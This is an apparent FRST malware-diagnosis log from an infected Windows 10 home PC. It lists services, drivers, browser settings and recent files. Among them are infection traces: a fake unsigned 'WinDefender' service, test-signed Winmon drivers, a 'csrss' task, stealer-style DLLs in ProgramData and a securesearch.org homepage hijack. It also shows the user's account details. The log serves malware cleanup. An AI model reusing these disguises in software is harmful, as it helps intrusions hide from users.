(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 84.16.96.225 84.16.96.2
Tcpip\..\Interfaces\{345663bd-b4f0-4a3c-9b78-46e31c76d760}: [DhcpNameServer] 84.16.96.225 84.16.96.2
Edge:
======
Edge DefaultProfile: Default
Edge Profile: C:\Users\42072\AppData\Local\Microsoft\Edge\User Data\Default [2020-10-20]
FireFox:
========
FF DefaultProfile: 5tautenb.default
FF ProfilePath: C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\5tautenb.default [2020-09-11]
FF NewTab: Mozilla\Firefox\Profiles\5tautenb.default -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
FF ProfilePath: C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 [2020-10-20]
FF Homepage: Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
FF NewTab: Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 -> hxxps://securesearch.org/homepage?hp=2&pId=BC180101&iDate=2020-09-11 04:31:44&bName=
FF Notifications: Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342 -> hxxps://mail.google.com; hxxps://uhta.getedicta.info
FF Extension: (Greasemonkey) - C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2020-10-09]
FF Plugin: @java.com/DTPlugin,version=11.261.2 -> C:\Program Files\Java\jre1.8.0_261\bin\dtplugin\npDeployJava1.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.261.2 -> C:\Program Files\Java\jre1.8.0_261\bin\plugin2\npjp2.dll [2020-10-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default [2020-10-20]
CHR Extension: (Prezentace) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-03-19]
CHR Extension: (Dokumenty) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-03-19]
CHR Extension: (Disk Google) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-03-19]
CHR Extension: (Seznam doplněk - Email) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\bgjpfhpjcgdppjbgnpnjllokbmcdllig [2020-09-12]
CHR Extension: (YouTube) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-03-19]
CHR Extension: (Tabulky) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-03-19]
CHR Extension: (d8yI+Hf7rX) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhiginakogfjlgjcgmcnahlmfllhicoe [2020-09-11]
CHR Extension: (Dokumenty Google offline) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-09-12]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-03-19]
CHR Extension: (Seznam doplněk - Esko) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\olfeabkoenfaoljndfecamgilllcpiak [2020-09-12]
CHR Extension: (Gmail) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-03-19]
CHR Extension: (Chrome Media Router) - C:\Users\42072\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-10-10]
CHR Profile: C:\Users\42072\AppData\Local\Google\Chrome\User Data\Guest Profile [2020-10-10]
CHR Profile: C:\Users\42072\AppData\Local\Google\Chrome\User Data\System Profile [2020-10-10]
CHR HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bgjpfhpjcgdppjbgnpnjllokbmcdllig]
CHR HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [olfeabkoenfaoljndfecamgilllcpiak]
Opera:
=======
OPR Extension: (book_helper) - C:\Users\42072\AppData\Roaming\Opera Software\Opera Stable\Extensions\fhiginakogfjlgjcgmcnahlmfllhicoe [2020-09-11]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 AegLauncher; C:\Program Files\MobiGame\aeg_launcher.exe [6312448 2020-08-28] () [File not signed]
S2 AMD External Events Utility; C:\WINDOWS\system32\atiesrxx.exe [223216 2015-12-16] (Microsoft Windows Hardware Compatibility Publisher -> AMD)
S2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [284872 2015-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [4069992 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 EasyAntiCheat; C:\Program Files\EasyAntiCheat\EasyAntiCheat.exe [802432 2020-10-11] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [2243528 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
S2 LMIGuardianSvc; C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe [405424 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
S2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [175240 2018-05-07] (Logitech Inc -> Logitech Inc.)
S2 MacriumService; C:\Program Files\Macrium\Common\MacriumService.exe [5996880 2020-08-05] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
S2 MobiGameUpdater; C:\Program Files\MobiGame\MobiGameUpdater.exe [256000 2020-08-28] () [File not signed]
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3918680 2020-09-03] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\NisSrv.exe [1516320 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2009.7-0\MsMpEng.exe [86088 2020-10-10] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 WinDefender; C:\WINDOWS\windefender.exe [1987072 2020-09-11] () [File not signed]
S2 ekrn; "C:\Program Files\ESET\ESET Security\ekrn.exe" [X]
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S1 16F618EAF6A0; C:\WINDOWS\16F618EAF6A0.sys [21784 2020-09-11] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]
S3 amdkmdag; C:\WINDOWS\system32\DRIVERS\atikmdag.sys [19525104 2015-12-16] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
S3 amdkmdap; C:\WINDOWS\system32\DRIVERS\atikmpag.sys [542192 2015-12-16] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [38672 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [51680 2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 Hamachi; C:\WINDOWS\System32\drivers\Hamdrv.sys [38512 2019-04-02] (Microsoft Windows Hardware Compatibility Publisher -> LogMeIn Inc.)
R3 LGBusEnum; C:\WINDOWS\system32\drivers\LGBusEnum.sys [32912 2018-05-07] (Logitech Inc -> Logitech Inc.)
S2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [13672 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [63632 2018-05-07] (Logitech Inc -> Logitech Inc.)
S3 LGVirHid; C:\WINDOWS\system32\drivers\LGVirHid.sys [24856 2018-05-07] (Logitech Inc -> Logitech Inc.)
S1 MobiVBoxDrv; C:\Program Files\MobiGame\vbox\MobiVBoxDrv.sys [255640 2020-08-11] (Iron Entertainment Inc. -> Oracle Corporation)
S2 SecDrv; C:\WINDOWS\system32\drivers\SECDRV.SYS [28400 2020-09-25] () [File not signed]
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [39304 2020-10-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [332008 2020-10-10] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [49376 2020-10-10] (Microsoft Windows -> Microsoft Corporation)
S3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [7248 2020-09-11] (WDKTestCert Admin,131480495282941941 -> ) [File not signed]
S3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [18616 2020-09-11] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) [File not signed]
S1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [28368 2020-09-11] (WDKTestCert Admin,131666266076831434 -> ) [File not signed] <==== ATTENTION
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-10-20 22:08 - 2020-10-20 22:09 - 000018954 _____ C:\Users\42072\Desktop\FRST.txt
2020-10-20 22:08 - 2020-10-20 22:08 - 000000000 ____D C:\FRST
2020-10-20 22:07 - 2020-10-20 22:07 - 002013696 _____ (Farbar) C:\Users\42072\Desktop\FRST.exe
2020-10-20 21:26 - 2020-10-20 21:26 - 000000000 ____D C:\rsit
2020-10-20 21:26 - 2020-10-20 21:26 - 000000000 ____D C:\Program Files\trend micro
2020-10-20 16:52 - 2020-10-20 21:18 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2020-10-20 16:51 - 2020-10-20 16:51 - 000000000 ____D C:\WINDOWS\pss
2020-10-20 16:38 - 2020-10-20 16:46 - 000000000 ____D C:\Program Files\ESET
2020-10-20 16:34 - 2020-10-20 16:34 - 006333872 _____ (ESET) C:\Users\42072\Downloads\eset_internet_security_live_installer.exe
2020-10-20 16:26 - 2020-10-20 21:15 - 000003478 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6a6eca8707e3f
2020-10-20 16:14 - 2020-10-20 16:22 - 000003478 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6a6eaf808aca1
2020-10-20 16:10 - 2020-10-20 16:10 - 000003478 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6a6ea70046158
2020-10-20 16:03 - 2020-10-20 16:29 - 000129056 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae.sys
2020-10-20 16:02 - 2020-10-20 16:30 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-10-20 16:00 - 2020-10-20 16:00 - 002062144 _____ (Malwarebytes) C:\Users\42072\Downloads\MBSetup.exe
2020-10-20 16:00 - 2020-10-20 16:00 - 000000000 ____D C:\Program Files\Malwarebytes
2020-10-16 15:51 - 2020-10-16 15:51 - 000755728 _____ (Moonsworth, LLC) C:\Users\42072\Downloads\Lunar Client v2.3.5.exe
2020-10-16 15:41 - 2020-10-16 15:41 - 000000216 _____ C:\Users\42072\Desktop\SMITE - Public Test.url
2020-10-15 20:02 - 2020-10-15 20:02 - 000003460 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2020-10-15 20:02 - 2020-10-15 20:02 - 000003336 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2020-10-13 17:06 - 2020-10-13 17:06 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-10-12 12:47 - 2020-10-12 12:47 - 000000000 ____D C:\Users\42072\Documents\My Games
2020-10-12 12:04 - 2020-10-12 12:04 - 000000000 ____D C:\Users\42072\AppData\Roaming\EasyAntiCheat
2020-10-12 12:03 - 2020-10-12 12:04 - 000000000 ____D C:\Program Files\EasyAntiCheat
2020-10-11 12:39 - 2020-10-11 12:39 - 000755720 _____ (Moonsworth, LLC) C:\Users\42072\Downloads\Lunar Client v2.3.4.exe
2020-10-11 12:02 - 2020-10-16 15:41 - 000000000 ____D C:\Users\42072\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2020-10-11 12:02 - 2020-10-11 12:02 - 000000216 _____ C:\Users\42072\Desktop\SMITE.url
2020-10-11 11:36 - 2020-10-11 11:36 - 000000000 ____D C:\Users\42072\AppData\Local\Steam
2020-10-11 11:33 - 2020-10-20 15:36 - 000000000 ____D C:\Program Files\Common Files\Steam
2020-10-11 11:32 - 2020-10-20 21:16 - 000000000 ____D C:\Program Files\Steam
2020-10-11 11:32 - 2020-10-11 11:32 - 001573568 _____ C:\Users\42072\Downloads\SteamSetup.exe
2020-10-11 11:32 - 2020-10-11 11:32 - 000000994 _____ C:\Users\Public\Desktop\Steam.lnk
2020-10-11 11:32 - 2020-10-11 11:32 - 000000994 _____ C:\ProgramData\Desktop\Steam.lnk
2020-10-11 11:32 - 2020-10-11 11:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2020-10-10 22:27 - 2020-10-10 22:27 - 000036044 _____ C:\Users\42072\Downloads\PVP-h.webp
2020-10-10 19:28 - 2020-10-10 22:06 - 1716267027 _____ C:\Users\42072\Downloads\Star-Wars-cast-1.cz-dabing.avi
2020-10-10 18:11 - 2020-10-10 18:11 - 000000000 ____D C:\Program Files\Common Files\Oracle
2020-10-10 18:10 - 2020-10-10 18:10 - 000000000 ____D C:\Program Files\Common Files\Java
2020-10-10 18:05 - 2020-10-10 19:03 - 1048576000 _____ C:\Users\42072\Downloads\Star Wars Epizoda I - Skrytá hrozba (1999).mkv.7z.004
2020-10-09 18:02 - 2020-10-09 18:02 - 067953134 _____ C:\Users\42072\Downloads\RiotClientServices.exe.ogdo
2020-10-09 16:28 - 2020-09-25 21:04 - 000000077 _____ C:\Users\42072\Desktop\pack.mcmeta
2020-10-09 15:14 - 2020-10-09 15:15 - 000000000 ____D C:\Users\42072\Desktop\hudebka
2020-10-09 15:10 - 2020-10-09 15:14 - 369135537 _____ C:\Users\42072\Downloads\zasilka-DK2W5P8NG9U6YNLM.zip
2020-09-27 15:04 - 2020-09-27 15:04 - 000002155 _____ C:\Users\Public\Desktop\Serious Sam 2.lnk
2020-09-27 15:04 - 2020-09-27 15:04 - 000002155 _____ C:\ProgramData\Desktop\Serious Sam 2.lnk
2020-09-27 15:04 - 2020-09-27 15:04 - 000000000 ____D C:\WINDOWS\system32\directx
2020-09-27 15:01 - 2016-03-26 15:57 - 000000000 ____D C:\Users\42072\Desktop\Serious Sam 2 CZ (v2.070)
2020-09-27 12:36 - 2020-09-27 15:00 - 2601257270 _____ C:\Users\42072\Downloads\Serious Sam 2 CZ (v2.070).rar
2020-09-26 19:47 - 2020-09-26 19:47 - 000002055 _____ C:\Users\Public\Desktop\Serious Sam 3 BFE.lnk
2020-09-26 19:47 - 2020-09-26 19:47 - 000002055 _____ C:\ProgramData\Desktop\Serious Sam 3 BFE.lnk
2020-09-26 19:45 - 2020-09-26 19:47 - 000000000 ____D C:\Program Files\Serious Sam 3 BFE
2020-09-26 19:40 - 2020-09-26 19:41 - 000000000 ____D C:\Users\42072\Desktop\Serious Sam
2020-09-26 19:40 - 2020-09-26 19:41 - 000000000 ____D C:\Users\42072\Desktop\party
2020-09-25 18:13 - 2020-09-25 18:13 - 000000000 ____D C:\Program Files\directx
2020-09-25 17:57 - 2020-09-25 17:57 - 000028400 _____ C:\WINDOWS\system32\Drivers\SECDRV.SYS
2020-09-25 17:54 - 2020-09-25 17:54 - 000001039 _____ C:\Users\42072\Desktop\GameSpy Arcade.lnk
2020-09-25 17:54 - 2020-09-25 17:54 - 000000000 ____D C:\Users\42072\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GameSpy Arcade
2020-09-25 17:54 - 2020-09-25 17:54 - 000000000 ____D C:\Program Files\GameSpy Arcade
2020-09-25 17:51 - 2020-09-27 15:03 - 000000000 ____D C:\Program Files\Croteam
2020-09-25 17:35 - 2020-09-25 17:35 - 000000000 ____D C:\Users\42072\AppData\Roaming\VEGAS
2020-09-25 17:35 - 2020-09-25 17:35 - 000000000 ____D C:\ProgramData\Magix
2020-09-25 17:16 - 2020-09-25 17:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech
2020-09-20 11:27 - 2020-09-20 11:27 - 112859648 _____ (Logitech Inc.) C:\Users\42072\Downloads\LGS_9.00.42_x86_Logitech.exe
2020-09-20 11:21 - 2020-09-20 11:22 - 113978120 _____ (Logicool Inc.) C:\Users\42072\Downloads\LGS_9.02.65_x86_Logicool.exe
2020-09-20 11:06 - 2020-09-20 11:07 - 036588168 _____ (Logitech, Inc.) C:\Users\42072\Downloads\lghub_installer.exe
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-10-20 21:21 - 2020-09-03 08:47 - 001605602 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-10-20 21:21 - 2019-12-07 14:21 - 000682184 _____ C:\WINDOWS\system32\perfh005.dat
2020-10-20 21:21 - 2019-12-07 14:21 - 000137000 _____ C:\WINDOWS\system32\perfc005.dat
2020-10-20 21:21 - 2019-12-07 08:10 - 000000000 ____D C:\WINDOWS\INF
2020-10-20 21:17 - 2020-09-03 08:50 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-10-20 21:17 - 2020-09-03 08:40 - 000008192 ___SH C:\DumpStack.log.tmp
2020-10-20 21:17 - 2019-12-07 08:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-10-20 21:15 - 2020-09-03 08:50 - 000003572 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-10-20 21:15 - 2020-04-24 17:59 - 000000000 ____D C:\Users\42072\AppData\Local\LogMeIn Hamachi
2020-10-20 16:56 - 2020-09-11 18:30 - 000003270 _____ C:\WINDOWS\system32\Tasks\csrss
2020-10-20 16:56 - 2019-12-07 08:12 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-10-20 16:40 - 2019-12-07 08:12 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-10-20 16:35 - 2019-10-04 18:17 - 000000000 ____D C:\Users\42072\AppData\LocalLow\Mozilla
2020-10-20 16:32 - 2020-09-06 16:53 - 000000000 ____D C:\Users\42072\.MobiVBox
2020-10-20 16:30 - 2020-09-06 16:31 - 000000000 ____D C:\Users\42072\AppData\Local\MobiGame
2020-10-20 16:06 - 2020-09-03 08:50 - 000003448 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-10-20 15:59 - 2020-08-20 11:14 - 000007602 _____ C:\Users\42072\AppData\Local\Resmon.ResmonCfg
2020-10-20 15:55 - 2020-09-03 08:40 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-10-20 15:05 - 2020-09-03 08:08 - 000000000 ____D C:\Users\42072
2020-10-18 19:51 - 2020-09-06 17:13 - 000000000 ____D C:\Users\42072\AppData\Local\GeometryDash
2020-10-18 19:49 - 2019-10-04 18:40 - 000000000 ____D C:\Users\42072\AppData\Roaming\.minecraft
2020-10-18 19:02 - 2020-03-17 19:18 - 000000000 ____D C:\Users\42072\AppData\Roaming\lunarclient
2020-10-17 12:40 - 2019-12-07 08:12 - 000000000 ___HD C:\Program Files\WindowsApps
2020-10-17 12:39 - 2020-06-13 16:22 - 000002365 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-10-17 12:39 - 2020-06-13 16:22 - 000002203 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-10-17 12:39 - 2020-06-13 16:22 - 000002203 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2020-10-15 19:53 - 2020-09-02 20:26 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-10-14 20:43 - 2020-06-07 17:52 - 000000000 ____D C:\Program Files\R.G. Mechanics
2020-10-14 20:33 - 2019-12-07 14:39 - 000000000 ____D C:\Users\42072\AppData\Roaming\Spotify
2020-10-14 19:55 - 2020-05-19 11:17 - 000000000 ____D C:\Users\42072\AppData\Local\ElevatedDiagnostics
2020-10-13 17:06 - 2019-10-04 18:20 - 000001166 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-10-12 11:39 - 2019-10-04 17:12 - 000000000 ____D C:\ProgramData\Package Cache
2020-10-10 18:11 - 2019-10-05 12:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-10-10 18:11 - 2019-10-05 11:59 - 000000000 ____D C:\Program Files\Java
2020-10-10 18:08 - 2019-10-05 12:00 - 000164008 _____ (Oracle Corporation) C:\WINDOWS\system32\WindowsAccessBridge.dll
2020-10-10 14:21 - 2019-10-04 16:40 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2020-10-09 17:59 - 2020-03-29 13:06 - 000001882 _____ C:\Users\Public\Desktop\League of Legends.lnk
2020-10-09 17:59 - 2020-03-29 13:06 - 000001882 _____ C:\ProgramData\Desktop\League of Legends.lnk
2020-10-09 15:26 - 2020-03-19 22:17 - 000002247 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-10-09 15:26 - 2020-03-19 22:17 - 000002206 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-10-09 15:26 - 2020-03-19 22:17 - 000002206 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-10-02 16:15 - 2019-10-05 13:55 - 000000000 ____D C:\Users\42072\AppData\Roaming\TS3Client
2020-09-28 11:49 - 2019-10-04 18:17 - 000000000 ____D C:\ProgramData\Mozilla
2020-09-25 21:50 - 2020-07-05 16:54 - 000000000 ____D C:\Users\42072\Desktop\assets
2020-09-25 18:20 - 2020-03-17 14:21 - 000000000 ____D C:\Program Files\Common Files\InstallShield
2020-09-25 18:19 - 2020-03-17 14:32 - 000000000 ___HD C:\Program Files\InstallShield Installation Information
2020-09-25 17:19 - 2020-06-05 22:24 - 000000000 ____D C:\Program Files\Logitech Gaming Software
2020-09-20 11:29 - 2020-07-10 19:33 - 000000000 ____D C:\Users\Public\Logi
==================== Files in the root of some directories ========
2020-09-11 18:26 - 2020-09-11 18:26 - 000334288 _____ (Mozilla Foundation) C:\ProgramData\freebl3.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000144848 _____ (Mozilla Foundation) C:\ProgramData\softokn3.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
2020-06-06 15:47 - 2017-06-27 17:26 - 000360779 _____ () C:\Users\42072\AppData\Roaming\BetterPvP_1.13.1.1_Forge_1.8.9.jar
2020-06-06 15:47 - 2018-03-10 12:06 - 000012002 _____ () C:\Users\42072\AppData\Roaming\MemoryFix-0.3.jar
2020-06-06 15:47 - 2017-11-21 18:52 - 000004306 _____ () C:\Users\42072\AppData\Roaming\MouseDelayFix-1.0.jar
2020-06-06 15:47 - 2017-01-07 22:50 - 000073014 _____ () C:\Users\42072\AppData\Roaming\OldAnimationsMod v2.3.1 Classloader FORGE MC1.8.9.jar
2020-06-06 15:47 - 2017-01-07 03:08 - 002261831 _____ () C:\Users\42072\AppData\Roaming\OldAnimationsMod v2.3.1 FORGE MC1.8.9.jar
2020-06-06 15:47 - 2018-04-20 16:30 - 002016181 _____ () C:\Users\42072\AppData\Roaming\OptiFine_1.8.9_HD_U_I7.jar
2020-06-06 15:47 - 2018-09-04 12:02 - 000073508 _____ () C:\Users\42072\AppData\Roaming\Orange's+Simple+Mods-1.2.jar
2020-06-06 15:47 - 2018-09-04 11:52 - 000015089 _____ () C:\Users\42072\AppData\Roaming\TimeChanger-1.0 (1.8.9).jar
2020-05-21 11:55 - 2020-05-22 10:43 - 000000035 _____ () C:\Users\42072\AppData\Roaming\WB.CFG
2020-06-06 15:47 - 2018-03-17 14:05 - 000062916 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] BetterFps-1.2.0.jar
2020-06-06 15:47 - 2018-03-17 13:51 - 000058995 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] FoamFixUnofficial.jar
2020-06-06 15:47 - 2018-03-04 16:59 - 000006718 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] NameChanger.jar
2020-06-06 15:47 - 2018-09-04 11:59 - 000026327 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] Powns Coords HUD - 1.0.jar
2020-06-06 15:47 - 2018-10-02 18:18 - 000024908 _____ () C:\Users\42072\AppData\Roaming\[v3] (1.8.9) canelex3keystrokes.jar
2020-09-11 18:32 - 2020-09-11 18:32 - 000000559 _____ () C:\Users\42072\AppData\Local\bowsakkdestx.txt
2020-08-20 11:14 - 2020-10-20 15:59 - 000007602 _____ () C:\Users\42072\AppData\Local\Resmon.ResmonCfg
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
safeboot: Minimal => The system is configured to boot to Safe Mode <==== ATTENTION
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 19-10-2020
Ran by 42072 (20-10-2020 22:10:00)
Running from C:\Users\42072\Desktop
Microsoft Windows 10 Pro Version 2004 19041.450 (X86) (2020-09-03 06:51:10)
Boot Mode: Safe Mode (minimal)
==========================================================
==================== Accounts: =============================
42072 (S-1-5-21-3093974370-3673700369-3101221773-1002 - Administrator - Enabled) => C:\Users\42072
Administrator (S-1-5-21-3093974370-3673700369-3101221773-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3093974370-3673700369-3101221773-503 - Limited - Disabled)
Guest (S-1-5-21-3093974370-3673700369-3101221773-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-3093974370-3673700369-3101221773-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {4FC75CA5-1654-5411-7CFB-1893D506BCF4}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
AMD Catalyst Control Center (HKLM\...\WUCCCApp) (Version: 1.00.0000 - AMD)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.12.0.1152 - Disc Soft Ltd)
DiskFixer version 1.0 (HKLM\...\DiskFixer_is1) (Version: 1.0 - MyAppsLand) <==== ATTENTION
DNPlayer, версия 5.7.8.13 (HKLM\...\{51D1A917-78AE-4E70-B8DC-88412D7B7226}_is1) (Version: 5.7.8.13 - DNPlayer)
Duke Nukem - Manhattan Project (HKLM\...\{8B9336DB-8D04-4325-BAFC-C7141D8E6CA1}) (Version: 1.0.0 - Arush Entertainment) Hidden
Duke Nukem - Manhattan Project (HKLM\...\InstallShield_{8B9336DB-8D04-4325-BAFC-C7141D8E6CA1}) (Version: 1.0.0 - Arush Entertainment)
DVD Architect (HKLM\...\{1D8D144F-3558-11E9-A3D6-00155D6302F2}) (Version: 7.0.100 - VEGAS)
Epic Games Launcher (HKLM\...\{1D4EB18B-0FEE-444E-B4D1-6F2CFBC363E6}) (Version: 1.1.267.0 - Epic Games, Inc.)
